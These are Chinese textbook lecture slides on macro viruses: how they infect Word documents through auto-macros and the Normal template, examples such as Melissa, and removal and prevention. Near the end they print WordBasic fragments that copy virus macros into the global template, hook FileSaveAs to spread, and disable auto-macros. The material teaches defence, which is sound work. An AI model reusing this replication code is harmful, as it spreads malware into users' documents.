当前位置:文档之家 › 第4章 宏病毒

第4章 宏病毒

  • 格式:ppt
  • 大小:398.00 KB
  • 文档页数:32

下载文档原格式

  / 32

合集下载

计算机网络安全基础第版教案

计算机网络安全基础第版教案

计算机网络安全基础第
版教案
TTA standardization office【TTA 5AB- TTAK 08- TTA 2C】
计算机网络安全基础教案
计算机网络安全基础教案
计算机网络安全基础教案
计算机网络安全基础教案
计算机网络安全基础教案
第 2 页计算机网络安全基础教案
计算机网络安全基础教案
计算机网络安全基础教案
计算机网络安全基础教案
计算机网络安全基础教案
计算机网络安全基础教案
计算机网络安全基础教案
计算机网络安全基础教案
计算机网络安全基础教案
计算机网络安全基础教案
计算机网络安全基础教案。

第4章 计算机病毒-计算机信息安全技术(第2版)-付永钢-清华大学出版社

第4章 计算机病毒-计算机信息安全技术(第2版)-付永钢-清华大学出版社
(3)通过软件下载网站传播。有些网站可能会被攻击者利用,将木马捆绑在 软件上,用户下载软件后如果没有进行安全检查就进行安装,木马就会驻留 内存。
• EXE文件病毒。
– 将自身代码添加在宿主程序中,通过修改指令指针的方 式,指向病毒起始位置来获取控制权。
• PE病毒
– 当前产生重大影响的病毒类型,如“CIH”、“尼姆达”、 “求职信”、“中国黑客”等。这类病毒主要感染 Windows系统中的PE文件格式文件(如EXE, SCR, DLL 等) 。
• (2) 传播方式多样。包括文件、电子邮件、Web服务器、网页和网络共 享等。
• (3) 制作技术不同于传统的病毒。许多蠕虫病毒是利用当前最新的编 程语言和编程技术来实现的,容易修改以产生新的变种。
• (4) 行踪隐蔽。蠕虫在传播过程中不需要像传统病毒那样要用户的辅 助工作,所以在蠕虫传播的过程第4章 计算机病毒
计算机病毒的分类
•按病毒按寄生方式分类
– 网络病毒 – 文件病毒 – 引导型病毒 – 混合型病毒
•按传播媒介分类
– 单机病毒 – 网络病毒
•按计算机病毒的链接方式分类
–源码型病毒 –嵌入型病毒 –外壳型病毒 –译码型病毒 –操作系统型病毒
第4章 计算机病毒
第4章 计算机病毒
第四章 计算机病毒
• 4.1 概述 • 4.2 计算机病毒的特征及分类 • 4.3常见的病毒类型 • 4.4计算机病毒制作与反病毒技术
4.1 概述
第4章 计算机病毒
• 带有恶意目的的破坏程序,称为恶意代码。
– 计算机病毒、木马、间谍软件、恶意广告、流 氓软件、逻辑炸弹、后门、僵尸网络、恶意脚 本等软件或代码片段。
4.1 概述
第4章 计算机病毒

Excel宏录制和自动化教程

Excel宏录制和自动化教程

Excel宏录制和自动化教程第一章:Excel宏录制基础Excel宏是一种自动化处理工具,通过录制和运行宏,可以达到快速处理数据和自动化操作的目的。

本章将介绍Excel宏录制的基础知识。

1.1 什么是Excel宏Excel宏是一系列的命令和操作步骤的集合,它们可以被录制下来以供重复使用。

宏可以执行一系列的操作,如数据筛选、图表生成、公式计算等,从而提高工作效率。

1.2 宏录制的步骤录制宏的步骤如下:(1)打开Excel软件并选择“开发工具”选项卡。

(2)点击“录制宏”按钮,设置宏的名称和储存位置。

(3)进行一系列的操作步骤,包括输入数据、应用公式等。

(4)点击“停止录制”按钮,宏录制完成。

1.3 宏安全性设置在录制和运行宏之前,我们需要设置宏的安全性级别,以防止恶意宏病毒的攻击。

在Excel选项中的“信任中心”中,我们可以设置宏的安全性级别,警告信息等。

第二章:Excel宏的高级应用除了基本的录制宏外,我们还可以进行自定义VBA(Visual Basic for Applications)编程,来实现更复杂的任务。

本章将介绍Excel宏的高级应用。

2.1 编辑和调试宏通过编辑宏代码,我们可以实现更加精细的控制。

在Excel中,可以通过开发工具栏的“宏”按钮来编辑和调试宏代码。

通过加入判断语句、循环语句等,可以实现更灵活的自动化操作。

2.2 自定义宏按钮除了通过开发工具栏的宏按钮运行宏之外,我们还可以在工具栏或快速访问工具栏上添加自定义按钮,以便更方便地运行宏。

通过自定义按钮,我们可以将常用的宏操作一键完成。

2.3 宏的相对引用和绝对引用在宏录制过程中,Excel默认使用相对引用来记录操作步骤。

但是在某些情况下,我们需要使用绝对引用来确保宏在不同位置的正确运行。

在宏录制过程中,可以通过切换工具栏上的相对引用按钮来进行设置。

第三章:Excel宏自动化应用示例本章将从实际案例出发,介绍Excel宏的自动化应用示例,包括数据导入、筛选和图表生成等。

《网络系统管理与维护》期末练习题

《网络系统管理与维护》期末练习题

第1章概述判断题:1.网络系统管理是指对网络的运行状态进行监测和控制,使其能够安全、可靠、高效、经济地为客户提供服务。

()T2.通常可以将网络管理系统分为管理站(Manager)和服务器(Server)两部分。

()F3.MIB定义了如何识别被管理对象,以及如何组织被管理对象的信息结构。

MIB中的对象按层次进行分类和命名。

()T4.网络管理包括五大功能:故障管理、配置管理、计费管理、性能管理和服务管理,简写为FCAPS。

()F5.故障管理(Fault Management)的主要任务是当网络运行出现异常(故障)时,能够迅速找到故障的位置和原因,对故障进行检测、诊断、隔离和纠正,以恢复网络的正常运行。

()T6.配置管理主要负责创建、检测和控制网络的配置状态。

()T7.计费管理为网络资源成本计算和收费提供依据,它记录网络资源的使用情况、提出计费报告、为网络资源的使用核算成本和提供收费依据。

()T8.性能管理的主要内容是对网络系统资源的吞吐量、使用率、时延、拥塞等系统性能进行分析,实现网络性能的监控和优化。

()T9.ISO的网络安全体系结构定义了六类安全机制。

()F10.身份验证,属于配置管理的主要功能。

()F11.SNMP的Trap报文用于代理主动向管理站通告重要事件。

()T12.审核技术能够记录用户使用计算机网络系统进行各种活动的过程,记录系统产生的各类事件。

()T13.SNMP的Trap报文由代理主动发给管理站,并且需要管理站的响应。

()F14.管理信息库(Management Information Base,MIB)是一个存储网络管理信息的数据库,由被管理对象组成。

()F单选题:1.()负责向被管理对象发出管理操作指令,并接收来自代理的通告信息。

AA.管理站B.代理C.管理信息库D.SNMP2.()是一个存储网络管理信息的数据库,由被管理对象组成。

CA.管理站B.代理C.管理信息库D.SNMP3.类似于用户的增减、设备的维修或更新、新技术的应用等事件,属于()范畴。

宏病毒技术专题知识宣讲培训课件

宏病毒技术专题知识宣讲培训课件
内容提纲
1. 计算机病毒概述
2. 脚本病毒及防御技术
3. 网页病毒及防御技术
4. 宏病毒及防御技术
5. Windows PE文件病毒及防御技术
6. 批处理文件病毒技术
7. U盘病毒及防御技术
8. 计算机病毒演化策略
1/15/2021
宏病毒技术专题知 识宣讲
0
第4章 宏病毒技术
主要内容 1. 宏病毒的定义 2. 宏病毒的特征 3. 宏病毒基本原理 4. 宏病毒的防治 5. 宏病毒演示实验
如果全局宏模板被感染,则Word再启动的时候将自动载 入宏技术专题知 识宣讲
10
4.2 宏病毒
宏病毒的控制权获取
控制权的获取
用户使用Word执行打开文档、保存文档、打印文 档和关闭文档等操作时,Word会查找指定的“内 建宏”
• 关闭文档之前查找“FileSave”宏,如果存在,首 先执行这个宏
1/15/2021
宏病毒技术专题知 识宣讲
2
4.1 宏病毒的定义
宏病毒定义
宏病毒:
利用系统的开放性专门制作的一个或多个具有病 毒特点的宏的集合,这种病毒宏的集合影响到计 算机的使用,并能通过文档及模板进行自我复制 及传播。
1/15/2021
宏病毒技术专题知 识宣讲
3
4.1 宏病毒的定义
支持宏病毒的应用系统特点
行的宏当然是最好的宿主
1/15/2021
宏病毒技术专题知 识宣讲
11
4.2 宏病毒原理 宏语言
Office程序和它们所使用的宏语言
Office程序版本
Word 6.x, 7.x
Excel 5.x, 7.x
Office 97, Word 8.0, Excel 6.0\8.0, Project 98, Access 8.0

计算机病毒课后题

计算机病毒课后题

第一章计算机病毒概述1、什么是计算机病毒?计算机病毒包括哪几类程序?答编制者在计算机程序中插入的破坏计算机功能或者破坏数据,影响计算机使用并且能够自我复制的一组计算机指令或者程序代码被称为计算机病毒(Computer Virus)。

具有破坏性,复制性和传染性。

(一)文件类病毒。

该病毒在操作系统执行文件时取得控制权并把自己依附在可执行文件上,然后利用这些指令来调用附在文件中某处的病毒代码。

当文件执行时,病毒会调出自己的代码来执行,接着又返回到正常的执行序列。

通常,这些病毒发作迅速且隐蔽性强,以至于用户并不知道病毒代码已被执行。

(二)引导扇区病毒。

它会潜伏在硬盘的引导扇区或主引导记录中。

触发引导区病毒的典型事件是系统日期和时间被篡改。

(三)多裂变病毒。

多裂变病毒是文件和引导扇区病毒的混合,它能感染可执行文件,从而能在网上迅速传播蔓延。

(四)隐蔽病毒。

这种病毒通过挂接中断修改和隐藏真面目,具有很大的欺骗性。

因此,当某系统函数被调用时,这些病毒便“伪造”结果,使一切看起来正常。

秘密病毒摧毁文件的方式是伪造文件大小和日期,隐藏对引导区的修改,而且使大多数操作重定向。

(五)异形病毒。

这是一种能变异的病毒,随着感染时间的不同,改变其不同的形式。

不同的感染操作会使病毒在文件中以不同的方式出现,使传统的模式匹配法失效。

(六)宏病毒。

宏病毒不只是感染可执行文件,还可感染一般应用软件程序。

它会影响系统的性能以及用户的工作效率。

宏病毒是利用宏语言编写的,不面向操作系统,所以它不受操作平台的约束,可以在DOS、Win-dows,Unix、Mac甚至在0S/2系统中传播。

宏病毒能被传到任何可运行编写宏病毒应用程序的机器中。

现在随着E-mail、WWW等强大的互联能力及宏语言的进一步强化,极大地增强了它的传播力。

2 、计算机病毒的发展可以大致划分为几个过程?每个过程的特点?答DOS引导阶段一般需要通过软盘启动后使用.引导型病毒利用软盘的启动原理工作,它们修改系统启动扇区,在计算机启动时首先取得控制权,减少系统内存,修改磁盘读写中断,影响系统工作效率,在系统存取磁盘时进行传播。

04 郑州市 2015 网络安全员培训考试资料 技术 第四章

第四章计算机恶意代码防治恶意是一种程序,它通过把代码在不被察觉的代码情况下镶嵌到另一段程序中,从而达到破坏被感染电脑数据、运行具有入侵性或破坏性的程序、破坏被感染电脑数据的安全性和完整性的目的。

恶意代码按传播方式,可以分成以下几类:1. 计算机病毒:一组能够进行自我传播、需要用户干预来触发执行的破坏性程序或代码。

如CIH、爱虫、新欢乐时光、求职信、恶鹰、rose…2. 蠕虫: 一种可以自我复制的完全独立的程序,它的传播不需要借助被感染主机中的其他程序。

蠕虫的自我复制不像其他的病毒,它可以自动创建与它的功能完全相同的副本,并在没人干涉的情况下自动运行。

蠕虫是通过系统存在的漏洞和设置的不安全性来进行入侵的,它的自身特性可以使它以及快的速度传输。

如红色代码、SQL蠕虫王、冲击波、震荡波、熊猫烧香。

3. 特洛伊木马:是指一类看起来具有正常功能,但实际上隐藏着很多用户不希望功能的程序,通常由控制端和被控制端两端组成。

一些木马程序会通过覆盖系统中已经存在的文件的方式存在于系统之中,同时它可以携带恶意代码,还有一些木马会以一个软件的身份出现,但它实际上是一个窃取密码的工具。

这种病毒通常不容易被发现。

如冰河、网络神偷、灰鸽子……4. 后门:使得攻击者可以对系统进行非授权访问的一类程序。

5. 恶意软件:是指在未明确提示用户或未经用户许可的情况下,在用户计算机或其他终端上安装运行,侵犯用户合法权益的软件。

6. 移动代码:是指能够从主机传输到客户端计算机上并执行的代码,它通常是作为病毒,蠕虫,或是特洛伊木马的一部分被传送到客户计算机上的。

另外,移动代码可以利用系统的漏洞进行入侵,例如非法的数据访问和盗取root帐号。

通常用于编写移动代码的工具包括Java applets,ActiveX,JavaScript,和VBScript。

二、计算机病毒1. 计算机病毒概述计算机病毒,是指编制或者在计算机程序中插入的破坏计算机功能或者毁坏数据,影响计算机使用,并能自我复制的一组计算机指令或者程序代码。

计算机题硬件基础试题复习题-按章节.docx

计算机组装*维护与故障排除基础教程第一章初步认识电脑一、填空题1.存储器是计算机系统中的,是用来的装置。

2.输入设备是指向计算机输入和的设备,是计算机与用户或其他设备通信的桥梁。

3.系统软件用于控制和协调电脑的运行、管理和维护,包括操作系统、和数据库管理系统3部分,其中是系统的核心,用于管理软硬件资源和数据资源。

4.应用软件是专为解决一些具体问题设计的软件,根据软件的用途不同,可以将其分为和。

5.CPU也称,是电脑的核心,主要用于运行与计算电脑中的所有数据,由、控制器、寄存器存、内部总线和系统总线组成。

6.按照存储器的用途分类,可以将其分为和。

7.硬件为电脑中的,具有,可靠性高、在断点后其中的数据也不会丢失等特点。

8.网卡也称,主要用于电脑与的连接,网卡可以讲接收到的其他网络设备传输数据包拆包,转换成能够识别的数据。

9.显示器也称,使电脑重要的输出设备,可以将电脑中的文本、图片或视频显示出来,显示器分为和。

二、判断题1.电脑中的所有操作都有CPU负责读取,CPU是译码并执行指令的核心部件。

2.计算机中的全部信息,包括输入的原始数据、计算机程序、中间运行结果和最终运算结果都保存在存储器中。

3.键盘、鼠标、显示器、摄像头、扫描仪、手写板和语音输入装置等都属于输入设备。

4.电脑中的其他硬件设备都安装在主板中,通过主板上的线路可以协调电脑中各个部件的工作,如CPU、内存和显卡。

5.计算机中所有程序的运行都是在内存中进行的,因此外存的性能对计算机的影响非常大。

6.硬盘是电脑中主要的存储部件,通常用于存放暂时性的数据和程序。

7.扫描仪使电脑的输入设备,可以将喜欢的图片或自己的照片扫描到电脑中存储。

第二章选购电脑硬件设备一、填空题1.主板包括、插座插槽、、BIOS芯片和CMOS电池等。

2.主板按照板型主要分为、Micro-ATX型、NLX型和型等几种。

3.一块完整的CPU由、核心和组成。

其中基板是整个CPU的。

计算机病毒防治课后答案参考

第二章一、填空:1、UltraEdit可以实现文字、Hex、ASCII的编辑;2、Doc文件的文件头信息是D0CF11E0,PowerPoint文件的文件头信息是D0CF11E0,Excel文件的文件头信息是D0CF11E0;3、单一影子模式仅为操作系统所在分区创建影像;4、影子系统分为单一影子模式和完全影子模式;5、对注册表修改前后进行对比可使用RegSnap工具软件;第三章典型计算机病毒剖析一、填空1、注册表一般Default、SAM、Security、Software、System5个文件组成。

2、注册表结构一般键、子键、分支、值项、默认值5个大类组成。

3、是否允许修改IE的主页设置的注册表表项是HKEY_CURRENT_USER\Software\Policies\Microsoft\InternetExplorer\Control Panel。

4、注册表中IE的主页设置项是“Home Page”=dword 000000015、打开注册表编辑器的命令是regedit。

6、网页脚本病毒的特点有病毒变种多、破坏力较大、感染能力强。

7、Word的模版文件是Normal.dot。

8、Office中宏使用的编程语言是VBA(Visual Basic for Application)。

9、宏可保存在当前工作表、word通用模版中。

10、蠕虫的两个特征是传染性和复制功能。

11、蠕虫病毒的攻击方式有随机探测方式、基于列表的随机探测方式、基于DNS 探测方式、基于路由的探测方式、蠕虫攻击模块。

12、windows32/Baby.worm病毒主要攻击服务器。

13、木马分为远程访问型木马、密码发送型木马、键盘记录型木马、毁坏型木马、FTP型木马。

14、木马程序自动启动的方式利用INI文件、注册表的先关程序启动,加入系统启动组,利用系统启动配置文件和与其他程序捆绑执行。

二、选择1、寄存在Office文档中,用VB语言编写的病毒程序属于( D )A、引导区型病毒 B文件型病毒C、混合型病毒D、宏病毒2、注册表备份文件的扩展名是( C )。

《计算机病毒》复习思考题及答案

《计算机病毒》复习思考题第一章计算机病毒概述1. 简述计算机病毒的定义和特征。

计算机病毒(Computer Virus),是一种人为制造的、能够进行自我复制的、具有对计算机资源进行破坏作用的一组程序或指令集合。

计算机病毒的可执行性(程序性)、传染性、非授权性、隐蔽性、潜伏性、可触发性、破坏性、攻击的主动性、针对性、衍生性、寄生性(依附性)、不可预见性、诱惑欺骗性、持久性。

2. 计算机病毒有哪些分类方法?根据每种分类方法,试举出一到两个病毒。

3. 为什么同一个病毒会有多个不同的名称?如何通过病毒的名称识别病毒的类型?国际上对病毒命名的一般惯例为“前缀+病毒名+后缀”,即三元组命名规则。

1、系统病毒系统病毒的前缀为:Win32、PE、Win95、W32、W95等。

2、蠕虫病毒蠕虫病毒的前缀是:Worm。

3、木马病毒、黑客病毒木马病毒其前缀是:Trojan,黑客病毒前缀名一般为Hack 。

4、脚本病毒脚本病毒的前缀是:Script。

5、宏病毒其实宏病毒是也是脚本病毒的一种,由于它的特殊性,因此在这里单独算成一类。

宏病毒的前缀是:Macro。

6、后门病毒后门病毒的前缀是:Backdoor。

7、病毒种植程序病毒后门病毒的前缀是:Dropper。

这类病毒的公有特性是运行时会从体内释放出一个或几个新的病毒到系统目录下,由释放出来的新病毒产生破坏。

8.破坏性程序病毒破坏性程序病毒的前缀是:Harm。

这类病毒的公有特性是本身具有好看的图标来诱惑用户点击,当用户点击这类病毒时,病毒便会直接对用户计算机产生破坏。

9.玩笑病毒玩笑病毒的前缀是:Joke。

10.捆绑机病毒捆绑机病毒的前缀是:Binder。

4. 简述计算机病毒产生的背景。

5. 计算机病毒有哪些传播途径?传播途径有两种,一种是通过网络传播,一种是通过硬件设备传播(软盘、U盘、光盘、硬盘、存储卡等)。

网络传播,又分为因特网传播和局域网传播两种。

硬件设备传播:通过不可移动的计算机硬件设备传播、通过移动存储设备传播、通过无线设备传播。

  1. 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
  2. 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
  3. 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。

恶意代码与计算机病毒 -原理、技术和实践
支持宏病毒的应用系统特点
要达到宏病毒传染的目的,系统须具备以下特
性:
− 可以把特定的宏命令代码附加在指定文件上; − 可以实现宏命令在不同文件之间的共享和传
递; − 可以在未经使用者许可的情况下获取某种控制 权。
恶意代码与计算机病毒 -原理、技术和实践
可支持宏病毒的应用系统
恶意代码与计算机病毒 -原理、技术和实践
经典宏病毒-O97M.Tristate.C病毒
O97M.Tristate.C宏病毒可以交叉感染MS Word 97、MS Excwel 97和MS PowerPoint 97等多种程序生成的数据 文件。 病毒从Word文档、Excel电子表格或PowerPoint幻灯片 被激活,并进行交叉感染。 病毒在Excel中被激活时,它在Excel Startup目录下 查找文档BOOK1.XLS,如果不存在,病毒将在该目录下 创建一个被感染的工作簿并使Excel的宏病毒保护功能 失效。病毒存放在被感染的电子表格的 “ThisWorkbook”中。
打开被感 染的文档
把宏加载到 内存
运行自动宏
宏病毒将自 己复制到全 局模板
新建(打开) 的文档被感染
恶意代码与计算机病毒 -原理、技术和实践
经典宏病毒-美丽莎 Melissa
利பைடு நூலகம்微软的Word宏和Outlook发送载有80个色情
文学网址的列表 它可感染Word 97或Word 2000,是一种Word宏病 毒 当用户打开一个受到感染的Word 97或Word 2000文件时,病毒会自动通过被感染者的 Outlook的通讯录,给前50个地址发出带有 W97M_MELISSA病毒的电子邮件。
恶意代码与计算机病毒 -原理、技术和实践
宏病毒的作用机制
模板在建立整个文
类别
宏 名
AutoExec AutoNew
运行条件
启动Word或加载 全局模板时 每次创建新文档 时
档中所起的作用是 作为一个基类。新 文档继承模板的属 性(包括宏、菜单 、格式等)。 编制宏病毒要用到 的宏如右表
自动宏

恶意代码与计算机病毒 -原理、技术和实践
宏语言
Office程序和它们所使用的宏语言
Office程序版本
Word 6.x, 7.x Excel 5.x, 7.x Office 97, Word 8.0, Excel 6.0\8.0, Project 98, Access 8.0 Office 2K, Outlook 2K, FrontPage 2K Office XP, Outlook 2002, Word 2002, Access 2002, FrontPage 2002
恶意代码与计算机病毒 -原理、技术和实践
− If (Dlg.Format = 0) Or (dlg.Format = 1) −



− − − −
Then MacroCopy "FileSaveAs", WindowName$() + ":FileSaveAs" MacroCopy "FileSave ", WindowName$() + ":FileSave" MacroCopy "PayLoad", WindowName$() + ":PayLoad" MacroCopy "FileOpen", WindowName$() + ":FileOpen" Dlg.Format = 1 End If FileDaveAs dlg End Sub
恶意代码与计算机病毒 -原理、技术和实践
− − − − − − − − − − − − − − − − −
'加入FileSaveAs 和拷贝到AutoExec and FileSaveAs. '有效代码不检查是否感染. '把代码加密使不可读. iWW6IInstance = Val(GetDocumentVar$("WW6Infector")) sMe$ = FileName$() Macro$ = sMe$ + ":PayLoad" MacroCopy Macro$, "Global:PayLoad", 1 Macro$ = sMe$ + ":FileOpen" MacroCopy Macro$, "Global:FileOpen", 1 Macro$ = sMe$ + ":FileSaveAs" MacroCopy Macro$, "Global:FileSaveAs", 1 Macro$ = sMe$ + ":AutoExec" MacroCopy Macro$, "Global:AutoExec", 1 SetProfileString "WW6I", Str$(iWW6IInstance + 1) End If Abort: End Sub 恶意代码与计算机病毒 -原理、技术和实践
恶意代码与计算机病毒 -原理、技术和实践
经典宏病毒-台湾NO.1B
病毒发作时,只要打开一个Word文档,就会被
要求计算一道5个至多4位数的连乘算式。 由于算式的复杂度,很难在短时间内计算出答 案,一旦计算错误,Word就会自动开启20个新 窗口,然后再次生成一道类似的算式,接着不 断往复,直至系统资源耗尽。
宏病毒关键技术
(1)自动执行的示例代码:
− Sub MAIN − On Error Goto Abort − iMacroCount = CountMacros(0, 0) − '检查是否感染该文档文件 − For i = 1 To iMacroCount − If MacroName$(i, 0, 0) = "PayLoad"
第四章 宏病毒
清华大学出版社
恶意代码与计算机病毒 -原理、技术和实践
本章的学习目标
掌握宏病毒概念 掌握宏病毒制作机制 了解宏病毒实例 掌握宏病毒防范方法 掌握宏病毒实验
恶意代码与计算机病毒 -原理、技术和实践
宏病毒定义
宏病毒是利用系统的开放性专门制作的一个或
多个具有病毒特点的宏的集合,这种病毒宏的 集合影响到计算机的使用,并能通过文档及模 板进行自我复制及传播。
AutoOpen
AutoClose AutoExit FileSave
每次打开已存在 的文档时
在关闭文档时
在退出Word或卸 载全局模板时
保存文件 改名另存为文件 打印文件 打开文件
标准宏
FileSaveAs FilePrint FileOpen
恶意代码与计算机病毒 -原理、技术和实践
Word宏病毒感染过程 编制语言VBA\WordBasic等 环境:VBE

对于已染毒的模板文件(Normal.dot),应先其中的 自动宏清除(AutoOpen、AutoClose、AutoNew),然 后将其置成只读方式。 对于其他已染毒的文件均应将自动宏清除,这样就可 以达到清除病毒的目的。 平时使用时要加强预防。对来历不明的宏最好删除。 禁止所有自动执行的宏。 安装反病毒软件。
传播极快 制作、变种方便 破坏可能性极大 多平台交叉感染 地域性问题
恶意代码与计算机病毒 -原理、技术和实践
宏病毒的共性
宏病毒会感染DOC文档文件和DOT模板文件。 打开时激活,通过Normal模板传播。 通过AutoOpen,AutoClose,AutoNew和
AutoExit等自动宏获得控制权。 病毒宏中必然含有对文档读写操作的宏指令。
恶意代码与计算机病毒 -原理、技术和实践
手工清除宏病毒的方法
1.打开宏菜单,在通用模板中删除您认为是病毒 的宏。 2.打开带有病毒宏的文档(模板),然后打开宏 菜单,在通用模板和病毒文件名模板中删除您 认为是病毒的宏。 3.保存清洁文档。
恶意代码与计算机病毒 -原理、技术和实践
预防宏病毒



− −
If macros.bDebug Then MsgBox "start ToolsMacro"
Dim dlg As OutilsMacro If macros.bDebug Then MsgBox "1" GetCurValues dlg If macros.bDebug Then MsgBox "2“ On Error Goto Skip
(2) SaveAs 程序:
− 这是一个当使用FILE/SAVE AS功能时,拷贝


− −
宏病毒到活动文本的程序。它使用了许多类似 于AutoExec程序的技巧。尽管示例代码短小, 但足以制作一个小巧的宏病毒。 Sub MAIN Dim dlg As FileSaveAs GetCurValues dlg Dialog dlg

− − −
恶意代码与计算机病毒 -原理、技术和实践
− − − − − − − − − − − − − − − − −
Dialog dlg OutilsMacro dlg Skip: On Error Goto ErrorRoutine End If REM enable automacros Disable AutoMacros 0 macros.SaveToGlobal(OldName$) macros.objective Goto Done ErrorRoutine: On Error Goto Done If macros.bDebug Then MsgBox "error " + Str$(Err) + " occurred" End If Done: End Sub